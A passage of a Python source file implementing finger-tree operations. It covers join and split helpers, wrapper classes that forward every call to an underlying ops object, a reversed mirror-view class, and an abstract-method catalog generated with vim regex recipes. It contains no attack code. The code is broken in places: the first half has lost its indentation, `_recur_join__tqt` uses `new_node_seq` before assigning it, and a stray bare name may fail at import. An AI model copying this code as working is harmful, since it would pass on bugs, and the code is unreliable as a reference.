(rtree, measured_result_before_rtree, tmay_mid_xnode, ltree, lmxtree) = ops.isplitL__tree(depth, tree, ops4auto_info, init_measured_result, measured_result2is_ok)
#output flip here!!!
return (lmxtree, ltree, tmay_mid_xnode, measured_result_before_rtree, rtree)
def join__qt(sf, depth, xnode_seq, rtree, /):
'depth -> (xnode_seq::[xnode<depth-1>]) -> (rtree::tree<depth>) -> tree<depth>'
if sf.is_tree_line(depth, rtree):
(xnode_seqR, auto_info) = sf.unbox_line_tree(depth, rtree)
new_xnode_seq = (*xnode_seq, *xnode_seqR)
new_tree = sf.mk_tree_from_xnode_seq(depth, new_xnode_seq)
else:
(ldigitR, mtreeR, rdigitR, auto_info) = sf.unbox_deep_tree(depth, rtree)
(xnode_seqR, auto_info) = sf.unbox_digit(depth, ldigitR)
new_xnode_seq = (*xnode_seq, *xnode_seqR)
#(new_xnode_seq, mtreeR, rdigitR)
new_tree = sf.mk_pseudo_deep_tree__with_xnode_seqL_of_arbitrary_size(depth, new_xnode_seq, mtreeR, rdigitR)
return new_tree
def join__tq(sf, depth, ltree, xnode_seq, /):
'depth -> (ltree::tree<depth>) -> (xnode_seq::[xnode<depth-1>]) -> tree<depth>'
ops = mk_ReversedFingerTreeOps(sf)
return ops.join__qt(depth, tuple_reversed(xnode_seq), ltree)
#input flip here!!!
def join__tqt(sf, depth, ltree, xnode_seq, rtree, /):
'depth -> (ltree::tree<depth>) -> (xnode_seq::[xnode<depth-1>]) -> (rtree::tree<depth>) -> tree<depth>'
r'''
mk_tree_from_xnode_seq
mk_pseudo_deep_tree__with_xnode_seqL_of_arbitrary_size
mk_pseudo_deep_tree__with_xnode_seqR_of_arbitrary_size
join__qt
join__tq
#'''
def _recur_join__tqt(depth, ltree, xnode_seq, rtree, /):
if sf.is_tree_line(depth, ltree):
(xnode_seqL, auto_info) = sf.unbox_line_tree(depth, ltree)
new_xnode_seq = (*xnode_seqL, *xnode_seq)
new_tree = sf.join__qt(depth, new_xnode_seq, rtree)
elif sf.is_tree_line(depth, rtree):
(xnode_seqR, auto_info) = sf.unbox_line_tree(depth, rtree)
new_xnode_seq = (*xnode_seq, *xnode_seqR)
new_tree = sf.join__tq(depth, ltree, new_xnode_seq)
else:
(ldigitL, mtreeL, rdigitL, auto_info) = sf.unbox_deep_tree(depth, ltree)
(ldigitR, mtreeR, rdigitR, auto_info) = sf.unbox_deep_tree(depth, rtree)
(xnode_seqL, auto_info) = sf.unbox_digit(depth, rdigitL)
(xnode_seqR, auto_info) = sf.unbox_digit(depth, ldigitR)
#(ldigitL, mtreeL, xnode_seqL, xnode_seq, xnode_seqR, mtreeR, rdigitR)
new_xnode_seq = (*xnode_seqL, *xnode_seq, *xnode_seqR)
new_node_seq = sf.xnode_seq2node_seq__dqd(depth, new_node_seq)
#(ldigitL, mtreeL, new_node_seq, mtreeR, rdigitR)
new_mtree = _recur_join__tqt(depth+1, mtreeL, new_node_seq, mtreeR)
#(ldigitL, new_mtree, rdigitR)
new_tree = sf.mk_deep_tree(depth, ldigitL, new_mtree, rdigitR)
return new_tree
#end of def _recur_join__tqt(depth, ltree, xnode_seq, rtree, /):
new_tree = _recur_join__tqt(depth, ltree, xnode_seq, rtree)
return new_tree
#end of def join__tqt(sf, depth, ltree, xnode_seq, rtree, /):
def _xnode_seq2node_seq__nen_count_pairs(sf, depth, xnode_seq, begin, nen2count, /,*, end=None):
if end is None:
end = len(xnode_seq)
nen_count_pairs = sorted(nen2count.items())
node_seq = sf.xnode_seq2node_seq__nen_count_pairs(depth, xnode_seq, begin, end, nen_count_pairs)
return node_seq
def xnode_seq2node_seq__nen_count_pairs(sf, depth, xnode_seq, begin, end, nen_count_pairs, /):
if not 0 <= begin <= end <= len(xnode_seq): raise ValueError
saved_end = end
node_seq = []
for nen, count in nen_count_pairs:
for _ in range(count):
end = begin + nen
if not begin < end <= saved_end: raise ValueError
node = sf.mk_node(depth, xnode_seq[begin:end])
node_seq.append(node)
begin = end
if begin != saved_end: raise ValueError
node_seq = tuple(node_seq)
return node_seq
def xnode_seq2node_seq__dqd(sf, depth, xnode_seq, /):
'depth -> (xnode_seq::[xnode<depth-1>]{len>=2*min_den}) -> (node_seq::[node<depth>]) #see:join__tqt'
sz2 = len(xnode_seq)
nen2count = sf.split_size__case_digit_seq_digit(sz2)
begin = 0
node_seq = sf._xnode_seq2node_seq__nen_count_pairs(depth, xnode_seq, begin, nen2count)
return node_seq
def xnode_seq2ldigit_node_seq__qd(sf, depth, xnode_seq, /):
'depth -> (xnode_seq::[xnode<depth-1>]{len>=1*min_den}) -> (ldigit::digit<depth>, node_seq::[node<depth>]) #see:join__qt/mk_pseudo_deep_tree__with_xnode_seqL_of_arbitrary_size'
#split_size__case_digit_seq
sz1 = len(xnode_seq)
den, nen2count = sf.split_size__case_digit_seq(sz1)
begin = den
ldigit = sf.mk_digit(depth, xnode_seq[:begin])
node_seq = sf._xnode_seq2node_seq__nen_count_pairs(depth, xnode_seq, begin, nen2count)
return ldigit, node_seq
def xnode_seq2ldigit_node_seq_rdigit__q(sf, depth, xnode_seq, /):
'depth -> (xnode_seq::[xnode<depth-1>]{len>=2*min_den}) -> (ldigit::digit<depth>, node_seq::[node<depth>], rdigit::digit<depth>) #see:mk_tree_from_xnode_seq'
#split_size__case_seq
sz2 = len(xnode_seq)
small_den, big_den, nen2count = sf.split_size__case_seq(sz2)
begin = small_den
end = sz2-big_den
ldigit = sf.mk_digit(depth, xnode_seq[:begin])
rdigit = sf.mk_digit(depth, xnode_seq[end:])
node_seq = sf._xnode_seq2node_seq__nen_count_pairs(depth, xnode_seq, begin, nen2count, end=end)
return ldigit, node_seq, rdigit
#end of class IFingerTreeOps(IFingerTreeOps__setting):
#HHHHH
r'''
tuple_reversed
ReversedMonoidOps(IMonoidOps)
ReversedMeasurableOps(IMeasurableOps)
mk_ReversedMonoidOps
mk_ReversedMeasurableOps
mk_ReversedFingerTreeOps
#'''
def tuple_reversed(seq, /):
    'seq -> tuple holding the items of seq in reverse order'
    rev_iter = reversed(seq)
    return tuple(rev_iter)
_mk_reversed_ops  # NOTE(review): bare name expression — a no-op if `_mk_reversed_ops` is defined earlier in the file, otherwise a NameError at import time. Presumably left as a reminder that the helper is required by mk_ReversedFingerTreeOps below; confirm it exists and consider removing this line.
def mk_ReversedFingerTreeOps(finger_tree_ops, /):
    'Build (or unwrap) the right-to-left mirror view of finger_tree_ops via _mk_reversed_ops.'
    return _mk_reversed_ops(
        IFingerTreeOps,
        ReversedFingerTreeOps,
        'get_original_finger_tree_ops',
        finger_tree_ops,
    )
#HHHHH
class WrappedFingerTreeOps__setting(IFingerTreeOps__setting):
    'vivi UserDict/UserList'
    # Delegating wrapper: stores another IFingerTreeOps__setting and forwards
    # every setting query to it unchanged (cf. the UserDict/UserList wrappers
    # mentioned in the docstring above).
    def __init__(sf, finger_tree_ops__setting, /):
        check_instance(IFingerTreeOps__setting, finger_tree_ops__setting)
        sf.__ops = finger_tree_ops__setting
    def get_original_finger_tree_ops__setting(sf, /):
        # Accessor for the wrapped object (held in a name-mangled attribute).
        return sf.__ops
    #begin of overrides_of_WrappedFingerTreeOps__setting
    #begin of wrapper_impl_of_IFingerTreeOps__setting
    ##################################
    ##################################
    ######IFingerTreeOps__setting#####
    ##################################
    ##################################
    @override
    def get_sorted_node_element_numbers(sf, /):
        '-> sorted tuple<uint>'
        return sf.__ops.get_sorted_node_element_numbers()
    @override
    def get_node_element_number_frozenset(sf, /):
        '-> frozenset<uint>'
        return sf.__ops.get_node_element_number_frozenset()
    @override
    def get_min_max_digit_element_number_pair(sf, /):
        '-> (min digit_element_numbers::uint, max digit_element_numbers::uint)'
        return sf.__ops.get_min_max_digit_element_number_pair()
    @override
    def ___split_size__case_digit_seq_digit___(sf, sz, /):
        '[2*min digit_element_numbers..] -> {nen:uint} #see:split_size__case_digit_seq_digit'
        # NOTE(review): the ___hook___ methods are forwarded as unbound calls
        # (`type(sf.__ops).m(sf.__ops, ...)`) per the generator recipe in this
        # file; presumably to dispatch on the wrapped object's class — confirm.
        return type(sf.__ops).___split_size__case_digit_seq_digit___(sf.__ops, sz)
    @override
    def ___split_size__case_digit_seq___(sf, sz, /):
        '[min digit_element_numbers..] -> (den, {nen:uint}) #see:split_size__case_digit_seq'
        return type(sf.__ops).___split_size__case_digit_seq___(sf.__ops, sz)
    @override
    def ___split_size__case_seq___(sf, sz, /):
        '[2*min digit_element_numbers..] -> (a::den, b::den, {nen:uint}){a<=b} #see:split_size__case_seq'
        return type(sf.__ops).___split_size__case_seq___(sf.__ops, sz)
    @override
    def ___get_num_child_xnode_seq_of_new_node_when_push_overflow___(sf, /):
        '-> num_child_xnode_seq=overflow_nen::nen #see:get_num_child_xnode_seq_of_new_node_when_push_overflow'
        return type(sf.__ops).___get_num_child_xnode_seq_of_new_node_when_push_overflow___(sf.__ops)
    #end of wrapper_impl_of_IFingerTreeOps__setting
    #end of overrides_of_WrappedFingerTreeOps__setting
#end of class WrappedFingerTreeOps__setting(IFingerTreeOps__setting):
class IFingerTreeOps__wrapped_setting(WrappedFingerTreeOps__setting, IFingerTreeOps):
    # Mixin combining the delegating setting layer with the full finger-tree
    # interface; WrappedFingerTreeOps builds on it below.
    pass
class WrappedFingerTreeOps(IFingerTreeOps__wrapped_setting):
    'vivi UserDict/UserList'
    # Pure delegation wrapper over another IFingerTreeOps: every hook is
    # forwarded to the wrapped ops object. Subclasses (e.g.
    # ReversedFingerTreeOps) override selected hooks to alter behavior.
    def __init__(sf, finger_tree_ops, /):
        check_instance(IFingerTreeOps, finger_tree_ops)
        super().__init__(finger_tree_ops)
        #sf.__ops = finger_tree_ops
    @property
    def __ops(sf, /):
        # Reuses the storage of the __setting base; same underlying object.
        return sf.get_original_finger_tree_ops__setting()
    def get_original_finger_tree_ops(sf, /):
        return sf.__ops
    #begin of overrides_of_WrappedFingerTreeOps
    r'''
    step of making wrapper_impl_of_IFingerTreeOps
        forward call 4 wrapper class
            the undering obj/wrapped obj named '__ops'
        each abstractmethod decl has form regex'^\s*def .*/):$''
        each abstractmethod decl occupy 3 lines
        copy all abstractmethod decls to file end
        exec below vim q/ search-cmd && q: edit-cmd, to remove non-abstractmethod func
            ^\(\s*@abstractmethod.*\)\n\(\s*def \s*\)\([a-zA-Z]\w*\)[(]\(\w\+\)\(, \)\?\(.*\), [/][)]:\n\(\s*\)\(\S.*\)
            .,$s//\1\r\2\3(\4\5\6, \/):\r\7\8\r\7return \4.__ops.\3(\6)
            ^\(\s*@abstractmethod.*\)\n\(\s*def \s*\)\(__\w*__\)[(]\(\w\+\)\(.*\), [/][)]:\n\(\s*\)\(\S.*\)
            .,$s//\1\r\2\3(\4\5, \/):\r\6\7\r\6return type(\4.__ops).\3(\4.__ops\5)
            @abstractmethod$
            .,$s//@override
    #'''
    #begin of wrapper_impl_of_IFingerTreeOps
    ##################################
    ##################################
    ######IFingerTreeOps__setting#####
    ##################################
    ##################################
    @override
    def get_sorted_node_element_numbers(sf, /):
        '-> sorted tuple<uint>'
        return sf.__ops.get_sorted_node_element_numbers()
    @override
    def get_node_element_number_frozenset(sf, /):
        '-> frozenset<uint>'
        return sf.__ops.get_node_element_number_frozenset()
    @override
    def get_min_max_digit_element_number_pair(sf, /):
        '-> (min digit_element_numbers::uint, max digit_element_numbers::uint)'
        return sf.__ops.get_min_max_digit_element_number_pair()
    @override
    def ___split_size__case_digit_seq_digit___(sf, sz, /):
        '[2*min digit_element_numbers..] -> {nen:uint} #see:split_size__case_digit_seq_digit'
        return type(sf.__ops).___split_size__case_digit_seq_digit___(sf.__ops, sz)
    @override
    def ___split_size__case_digit_seq___(sf, sz, /):
        '[min digit_element_numbers..] -> (den, {nen:uint}) #see:split_size__case_digit_seq'
        return type(sf.__ops).___split_size__case_digit_seq___(sf.__ops, sz)
    @override
    def ___split_size__case_seq___(sf, sz, /):
        '[2*min digit_element_numbers..] -> (a::den, b::den, {nen:uint}){a<=b} #see:split_size__case_seq'
        return type(sf.__ops).___split_size__case_seq___(sf.__ops, sz)
    @override
    def ___get_num_child_xnode_seq_of_new_node_when_push_overflow___(sf, /):
        '-> num_child_xnode_seq=overflow_nen::nen #see:get_num_child_xnode_seq_of_new_node_when_push_overflow'
        return type(sf.__ops).___get_num_child_xnode_seq_of_new_node_when_push_overflow___(sf.__ops)
    ##################################
    ##################################
    ###########IFingerTreeOps#########
    ##################################
    ##################################
    ##################################
    @override
    def ___get_monoid_ops4auto_info___(sf, /):
        '-> monoid_ops<auto_info>::IMonoidOps #see:get_monoid_ops4auto_info'
        return type(sf.__ops).___get_monoid_ops4auto_info___(sf.__ops)
    @override
    def ___get_auto_info_from_element___(sf, element, /):
        'element -> auto_info #see:get_auto_info_from_element'
        return type(sf.__ops).___get_auto_info_from_element___(sf.__ops, element)
    @override
    def ___get_auto_info_from_node___(sf, depth, node, /):
        'depth -> node<depth> -> auto_info #see:get_auto_info_from_node'
        return type(sf.__ops).___get_auto_info_from_node___(sf.__ops, depth, node)
    @override
    def ___get_auto_info_from_digit___(sf, depth, digit, /):
        'depth -> digit<depth> -> auto_info #see:get_auto_info_from_digit'
        return type(sf.__ops).___get_auto_info_from_digit___(sf.__ops, depth, digit)
    @override
    def ___get_auto_info_from_line_tree___(sf, depth, line_tree, /):
        'depth -> line_tree<depth> -> auto_info #see:get_auto_info_from_line_tree'
        return type(sf.__ops).___get_auto_info_from_line_tree___(sf.__ops, depth, line_tree)
    @override
    def ___get_auto_info_from_deep_tree___(sf, depth, deep_tree, /):
        'depth -> deep_tree<depth> -> auto_info #see:get_auto_info_from_deep_tree'
        return type(sf.__ops).___get_auto_info_from_deep_tree___(sf.__ops, depth, deep_tree)
    @override
    def ___get_num_child_xnode_seq_of_node___(sf, depth, node, /):
        'depth -> node<depth> -> num_child_xnode_seq #see:get_num_child_xnode_seq_of_node'
        return type(sf.__ops).___get_num_child_xnode_seq_of_node___(sf.__ops, depth, node)
    @override
    def ___get_num_child_xnode_seq_of_digit___(sf, depth, digit, /):
        'depth -> digit<depth> -> num_child_xnode_seq #see:get_num_child_xnode_seq_of_digit'
        return type(sf.__ops).___get_num_child_xnode_seq_of_digit___(sf.__ops, depth, digit)
    @override
    def ___get_num_child_xnode_seq_of_line_tree___(sf, depth, line_tree, /):
        'depth -> line_tree<depth> -> num_child_xnode_seq #see:get_num_child_xnode_seq_of_line_tree'
        return type(sf.__ops).___get_num_child_xnode_seq_of_line_tree___(sf.__ops, depth, line_tree)
    @override
    def ___careless_check_auto_info___(sf, auto_info, /):
        'obj{?auto_info} -> (None|raise) #see:careless_check_auto_info'
        return type(sf.__ops).___careless_check_auto_info___(sf.__ops, auto_info)
    @override
    def careless_check_user_obj(sf, user_obj, /):
        'obj{?user_obj} -> (None|raise)'
        return sf.__ops.careless_check_user_obj(user_obj)
    @override
    def careless_check_element(sf, element, /):
        'obj{?element} -> (None|raise)'
        return sf.__ops.careless_check_element(element)
    @override
    def ___careless_check_depth_of_node___(sf, depth, node, /):
        'depth -> obj{?node<depth>} -> (None|raise) #see:careless_check_depth_of_node'
        return type(sf.__ops).___careless_check_depth_of_node___(sf.__ops, depth, node)
    @override
    def ___careless_check_depth_of_digit___(sf, depth, digit, /):
        'depth -> obj{?digit<depth>} -> (None|raise) #see:careless_check_depth_of_digit'
        return type(sf.__ops).___careless_check_depth_of_digit___(sf.__ops, depth, digit)
    @override
    def ___careless_check_depth_of_line_tree___(sf, depth, line_tree, /):
        'depth -> obj{?line_tree<depth>} -> (None|raise) #see:careless_check_depth_of_line_tree'
        return type(sf.__ops).___careless_check_depth_of_line_tree___(sf.__ops, depth, line_tree)
    @override
    def ___careless_check_depth_of_deep_tree___(sf, depth, deep_tree, /):
        'depth -> obj{?deep_tree<depth>} -> (None|raise) #see:careless_check_depth_of_deep_tree'
        return type(sf.__ops).___careless_check_depth_of_deep_tree___(sf.__ops, depth, deep_tree)
    @override
    def ___mk_element__calc_auto_info___(sf, user_obj, /):
        'raw user_obj -> boxed element #see:mk_element'
        return type(sf.__ops).___mk_element__calc_auto_info___(sf.__ops, user_obj)
    @override
    def ___mk_node__not_auto___(sf, depth, xnode_seq, auto_info, /):
        'depth -> [xnode<depth-1>] -> auto_info -> node<depth> #see:mk_node'
        return type(sf.__ops).___mk_node__not_auto___(sf.__ops, depth, xnode_seq, auto_info)
    @override
    def ___mk_digit__not_auto___(sf, depth, xnode_seq, auto_info, /):
        'depth -> [xnode<depth-1>] -> auto_info -> digit<depth> #see:mk_digit'
        return type(sf.__ops).___mk_digit__not_auto___(sf.__ops, depth, xnode_seq, auto_info)
    @override
    def ___mk_line_tree__not_auto___(sf, depth, xnode_seq, auto_info, /):
        'depth -> [xnode<depth-1>] -> auto_info -> line_tree<depth> #see:mk_line_tree'
        return type(sf.__ops).___mk_line_tree__not_auto___(sf.__ops, depth, xnode_seq, auto_info)
    @override
    def ___mk_deep_tree__not_auto___(sf, depth, ldigit, mtree, rdigit, auto_info, /):
        'depth -> digit<depth> -> tree<depth+1> -> digit<depth> -> auto_info -> deep_tree<depth> #see:mk_deep_tree'
        return type(sf.__ops).___mk_deep_tree__not_auto___(sf.__ops, depth, ldigit, mtree, rdigit, auto_info)
    @override
    def ___unbox_element___(sf, element, /):
        'boxed element -> (raw user_obj, auto_info) #see:unbox_element'
        return type(sf.__ops).___unbox_element___(sf.__ops, element)
    @override
    def ___unbox_node___(sf, depth, node, /):
        'depth -> node<depth> -> ([xnode<depth-1>], auto_info) #see:unbox_node'
        return type(sf.__ops).___unbox_node___(sf.__ops, depth, node)
    @override
    def ___unbox_digit___(sf, depth, digit, /):
        'depth -> digit<depth> -> ([xnode<depth-1>], auto_info) #see:unbox_digit'
        return type(sf.__ops).___unbox_digit___(sf.__ops, depth, digit)
    @override
    def ___unbox_line_tree___(sf, depth, line_tree, /):
        'depth -> line_tree<depth> -> ([xnode<depth-1>], auto_info) #see:unbox_line_tree'
        return type(sf.__ops).___unbox_line_tree___(sf.__ops, depth, line_tree)
    @override
    def ___unbox_deep_tree___(sf, depth, deep_tree, /):
        'depth -> deep_tree<depth> -> (digit<depth>, tree<depth+1>, digit<depth>, auto_info) #see:unbox_deep_tree'
        return type(sf.__ops).___unbox_deep_tree___(sf.__ops, depth, deep_tree)
    @override
    def ___is_tree_line___(sf, depth, tree, /):
        'depth -> tree<depth> -> bool'
        return type(sf.__ops).___is_tree_line___(sf.__ops, depth, tree)
    #end of wrapper_impl_of_IFingerTreeOps
    #end of overrides_of_WrappedFingerTreeOps
#end of class WrappedFingerTreeOps(IFingerTreeOps):
#HHHHH
class ReversedFingerTreeOps(WrappedFingerTreeOps):
    r'''Right-to-left mirror view over another IFingerTreeOps.

    reverse xnode_seq for input@___mk.../output@unbox...
    flip lhs/rhs@monoid_ops<auto_info>
    flip lhs/rhs@monoid_ops<measured_result>
    to impl R by L @IFingerTreeOps:
        may_ipopR__tree <<== may_ipopL__tree
        ipushR__tree <<== ipushL__tree
        isplitR__tree <<== isplitL__tree
        join__??
    #'''
    def __init__(sf, finger_tree_ops, /):
        super().__init__(finger_tree_ops)
        # Never nest two reversed views; reversing twice should unwrap instead
        # (see mk_ReversedFingerTreeOps/_mk_reversed_ops). BUGFIX: the original
        # tested `type(sf.__ops)` while `__ops` was a plain method, so the
        # check compared against a bound-method type and never fired.
        if type(finger_tree_ops) is __class__: raise TypeError
        sf.__rops4a = mk_ReversedMonoidOps(finger_tree_ops.get_monoid_ops4auto_info())
    @property
    def __ops(sf, /):
        # BUGFIX: must be a property (as in WrappedFingerTreeOps). Without the
        # decorator, `sf.__ops` yielded the bound method itself, so every
        # `type(sf.__ops).___x___(sf.__ops, ...)` delegation below broke.
        return sf.get_original_finger_tree_ops()
    #begin of overrides_of_ReversedFingerTreeOps
    @override
    def ___get_monoid_ops4auto_info___(sf, /):
        '-> monoid_ops<auto_info>::IMonoidOps #see:get_monoid_ops4auto_info'
        # The flipped monoid is built once in __init__.
        return sf.__rops4a
    @override
    def ___mk_node__not_auto___(sf, depth, xnode_seq, auto_info, /):
        'depth -> [xnode<depth-1>] -> auto_info -> node<depth> #see:mk_node'
        # Children are stored in the underlying (left-to-right) order.
        return type(sf.__ops).___mk_node__not_auto___(sf.__ops, depth, tuple_reversed(xnode_seq), auto_info)
    @override
    def ___mk_digit__not_auto___(sf, depth, xnode_seq, auto_info, /):
        'depth -> [xnode<depth-1>] -> auto_info -> digit<depth> #see:mk_digit'
        return type(sf.__ops).___mk_digit__not_auto___(sf.__ops, depth, tuple_reversed(xnode_seq), auto_info)
    @override
    def ___mk_line_tree__not_auto___(sf, depth, xnode_seq, auto_info, /):
        'depth -> [xnode<depth-1>] -> auto_info -> line_tree<depth> #see:mk_line_tree'
        return type(sf.__ops).___mk_line_tree__not_auto___(sf.__ops, depth, tuple_reversed(xnode_seq), auto_info)
    @override
    def ___mk_deep_tree__not_auto___(sf, depth, ldigit, mtree, rdigit, auto_info, /):
        'depth -> digit<depth> -> tree<depth+1> -> digit<depth> -> auto_info -> deep_tree<depth> #see:mk_deep_tree'
        # The left and right digits swap roles in the mirrored view.
        return type(sf.__ops).___mk_deep_tree__not_auto___(sf.__ops, depth, rdigit, mtree, ldigit, auto_info)
    @override
    def ___unbox_node___(sf, depth, node, /):
        'depth -> node<depth> -> ([xnode<depth-1>], auto_info) #see:unbox_node'
        (xnode_seq, auto_info) = type(sf.__ops).___unbox_node___(sf.__ops, depth, node)
        return (tuple_reversed(xnode_seq), auto_info)
    @override
    def ___unbox_digit___(sf, depth, digit, /):
        'depth -> digit<depth> -> ([xnode<depth-1>], auto_info) #see:unbox_digit'
        (xnode_seq, auto_info) = type(sf.__ops).___unbox_digit___(sf.__ops, depth, digit)
        return (tuple_reversed(xnode_seq), auto_info)
    @override
    def ___unbox_line_tree___(sf, depth, line_tree, /):
        'depth -> line_tree<depth> -> ([xnode<depth-1>], auto_info) #see:unbox_line_tree'
        (xnode_seq, auto_info) = type(sf.__ops).___unbox_line_tree___(sf.__ops, depth, line_tree)
        return (tuple_reversed(xnode_seq), auto_info)
    @override
    def ___unbox_deep_tree___(sf, depth, deep_tree, /):
        'depth -> deep_tree<depth> -> (digit<depth>, tree<depth+1>, digit<depth>, auto_info) #see:unbox_deep_tree'
        # BUGFIX: the original mistakenly delegated to ___unbox_line_tree___.
        (rdigit, mtree, ldigit, auto_info) = type(sf.__ops).___unbox_deep_tree___(sf.__ops, depth, deep_tree)
        return (ldigit, mtree, rdigit, auto_info)
    #end of overrides_of_ReversedFingerTreeOps
#end of class ReversedFingerTreeOps(IFingerTreeOps):
r'''
def check_finger_tree_ops__part1__nens(finger_tree_ops:IFingerTreeOps, /):
check_instance(IFingerTreeOps, finger_tree_ops)
check_finger_tree_ops__setting(finger_tree_ops)
... ...
#'''
#HHHHH
r'''
step of making abstractmethod_decls_of_IFingerTreeOps
get abstractmethod decl
each abstractmethod decl occupy 3 lines
copy whole class body to file end
exec below vim q/ search-cmd && q: edit-cmd, to remove non-abstractmethod func
^\(\s*@abstractmethod.*\)\n\(.*\)\n\(.*\)
.,$s//##?!\1\r##?!\2\r##?!\3
^\(##?!\)\@!.*\n
.,$s//
^\(##?!\)
.,$s//
#'''
#begin of abstractmethod_decls_of_IFingerTreeOps
class abstractmethod_decls_of_IFingerTreeOps(IFingerTreeOps):
    'Catalog of the abstract methods of IFingerTreeOps (generated via the vim recipe above); kept as documentation/reference, not for instantiation.'
    ##################################
    ##################################
    ######IFingerTreeOps__setting#####
    ##################################
    ##################################
    @abstractmethod
    def get_sorted_node_element_numbers(sf, /):
        '-> sorted tuple<uint>'
    @abstractmethod
    def get_node_element_number_frozenset(sf, /):
        '-> frozenset<uint>'
    @abstractmethod
    def get_min_max_digit_element_number_pair(sf, /):
        '-> (min digit_element_numbers::uint, max digit_element_numbers::uint)'
    @abstractmethod
    def ___split_size__case_digit_seq_digit___(sf, sz, /):
        '[2*min digit_element_numbers..] -> {nen:uint} #see:split_size__case_digit_seq_digit'
    @abstractmethod
    def ___split_size__case_digit_seq___(sf, sz, /):
        '[min digit_element_numbers..] -> (den, {nen:uint}) #see:split_size__case_digit_seq'
    @abstractmethod
    def ___split_size__case_seq___(sf, sz, /):
        '[2*min digit_element_numbers..] -> (a::den, b::den, {nen:uint}){a<=b} #see:split_size__case_seq'
    @abstractmethod
    def ___get_num_child_xnode_seq_of_new_node_when_push_overflow___(sf, /):
        '-> num_child_xnode_seq=overflow_nen::nen #see:get_num_child_xnode_seq_of_new_node_when_push_overflow'
    ##################################
    ##################################
    ###########IFingerTreeOps#########
    ##################################
    ##################################
    ##################################
    @abstractmethod
    def ___get_monoid_ops4auto_info___(sf, /):
        '-> monoid_ops<auto_info>::IMonoidOps #see:get_monoid_ops4auto_info'
    @abstractmethod
    def ___get_auto_info_from_element___(sf, element, /):
        'element -> auto_info #see:get_auto_info_from_element'
    @abstractmethod
    def ___get_auto_info_from_node___(sf, depth, node, /):
        'depth -> node<depth> -> auto_info #see:get_auto_info_from_node'
    @abstractmethod
    def ___get_auto_info_from_digit___(sf, depth, digit, /):
        'depth -> digit<depth> -> auto_info #see:get_auto_info_from_digit'
    @abstractmethod
    def ___get_auto_info_from_line_tree___(sf, depth, line_tree, /):
        'depth -> line_tree<depth> -> auto_info #see:get_auto_info_from_line_tree'
    @abstractmethod
    def ___get_auto_info_from_deep_tree___(sf, depth, deep_tree, /):
        'depth -> deep_tree<depth> -> auto_info #see:get_auto_info_from_deep_tree'
    @abstractmethod
    def ___get_num_child_xnode_seq_of_node___(sf, depth, node, /):
        'depth -> node<depth> -> num_child_xnode_seq #see:get_num_child_xnode_seq_of_node'
    @abstractmethod
    def ___get_num_child_xnode_seq_of_digit___(sf, depth, digit, /):
        'depth -> digit<depth> -> num_child_xnode_seq #see:get_num_child_xnode_seq_of_digit'
    @abstractmethod
    def ___get_num_child_xnode_seq_of_line_tree___(sf, depth, line_tree, /):
        'depth -> line_tree<depth> -> num_child_xnode_seq #see:get_num_child_xnode_seq_of_line_tree'
    @abstractmethod
    def ___careless_check_auto_info___(sf, auto_info, /):
        'obj{?auto_info} -> (None|raise) #see:careless_check_auto_info'
    @abstractmethod
    def careless_check_user_obj(sf, user_obj, /):
        'obj{?user_obj} -> (None|raise)'
    @abstractmethod
    def careless_check_element(sf, element, /):
        'obj{?element} -> (None|raise)'
    @abstractmethod
    def ___careless_check_depth_of_node___(sf, depth, node, /):
        'depth -> obj{?node<depth>} -> (None|raise) #see:careless_check_depth_of_node'
    @abstractmethod
    def ___careless_check_depth_of_digit___(sf, depth, digit, /):
        'depth -> obj{?digit<depth>} -> (None|raise) #see:careless_check_depth_of_digit'
    @abstractmethod
    def ___careless_check_depth_of_line_tree___(sf, depth, line_tree, /):
        'depth -> obj{?line_tree<depth>} -> (None|raise) #see:careless_check_depth_of_line_tree'
    @abstractmethod
    def ___careless_check_depth_of_deep_tree___(sf, depth, deep_tree, /):
        'depth -> obj{?deep_tree<depth>} -> (None|raise) #see:careless_check_depth_of_deep_tree'
    @abstractmethod
    def ___mk_element__calc_auto_info___(sf, user_obj, /):
        'raw user_obj -> boxed element #see:mk_element'
    @abstractmethod
    def ___mk_node__not_auto___(sf, depth, xnode_seq, auto_info, /):
        'depth -> [xnode<depth-1>] -> auto_info -> node<depth> #see:mk_node'
    @abstractmethod
    def ___mk_digit__not_auto___(sf, depth, xnode_seq, auto_info, /):
        'depth -> [xnode<depth-1>] -> auto_info -> digit<depth> #see:mk_digit'
    @abstractmethod
    def ___mk_line_tree__not_auto___(sf, depth, xnode_seq, auto_info, /):
        'depth -> [xnode<depth-1>] -> auto_info -> line_tree<depth> #see:mk_line_tree'
    @abstractmethod
    def ___mk_deep_tree__not_auto___(sf, depth, ldigit, mtree, rdigit, auto_info, /):
        'depth -> digit<depth> -> tree<depth+1> -> digit<depth> -> auto_info -> deep_tree<depth> #see:mk_deep_tree'
    @abstractmethod
    def ___unbox_element___(sf, element, /):
        'boxed element -> (raw user_obj, auto_info) #see:unbox_element'
    @abstractmethod
    def ___unbox_node___(sf, depth, node, /):
        'depth -> node<depth> -> ([xnode<depth-1>], auto_info) #see:unbox_node'
    @abstractmethod
    def ___unbox_digit___(sf, depth, digit, /):
        'depth -> digit<depth> -> ([xnode<depth-1>], auto_info) #see:unbox_digit'
    @abstractmethod
    def ___unbox_line_tree___(sf, depth, line_tree, /):
        'depth -> line_tree<depth> -> ([xnode<depth-1>], auto_info) #see:unbox_line_tree'
    @abstractmethod
    def ___unbox_deep_tree___(sf, depth, deep_tree, /):
        'depth -> deep_tree<depth> -> (digit<depth>, tree<depth+1>, digit<depth>, auto_info) #see:unbox_deep_tree'
    @abstractmethod
    def ___is_tree_line___(sf, depth, tree, /):
        'depth -> tree<depth> -> bool'
#end of class abstractmethod_decls_of_IFingerTreeOps(IFingerTreeOps):
#end of abstractmethod_decls_of_IFingerTreeOps
#HHHHH
# Plain record holding the knobs of one finger-tree configuration:
#   sorted_nens      - ascending tuple of allowed node element numbers
#   nen_set          - the same numbers as a frozenset (fast membership)
#   min_max_den_pair - (min, max) allowed digit element numbers
#   overflow_nen     - node size used when a push overflows a digit
#   may_ordered_nens - optional explicit ordering of the nens, or None
NamedTuple4FingerTreeOps__setting = namedtuple(
    'NamedTuple4FingerTreeOps__setting',
    ['sorted_nens', 'nen_set', 'min_max_den_pair', 'overflow_nen', 'may_ordered_nens'],
)
def mk_NamedTuple4FingerTreeOps__setting(nens, min_max_den_pair, overflow_nen, may_ordered_nens, /):
    '''Build the raw configuration record from an iterable of node element numbers.'''
    return NamedTuple4FingerTreeOps__setting(
        sorted_nens=tuple(sorted(nens)),
        nen_set=frozenset(nens),
        min_max_den_pair=min_max_den_pair,
        overflow_nen=overflow_nen,
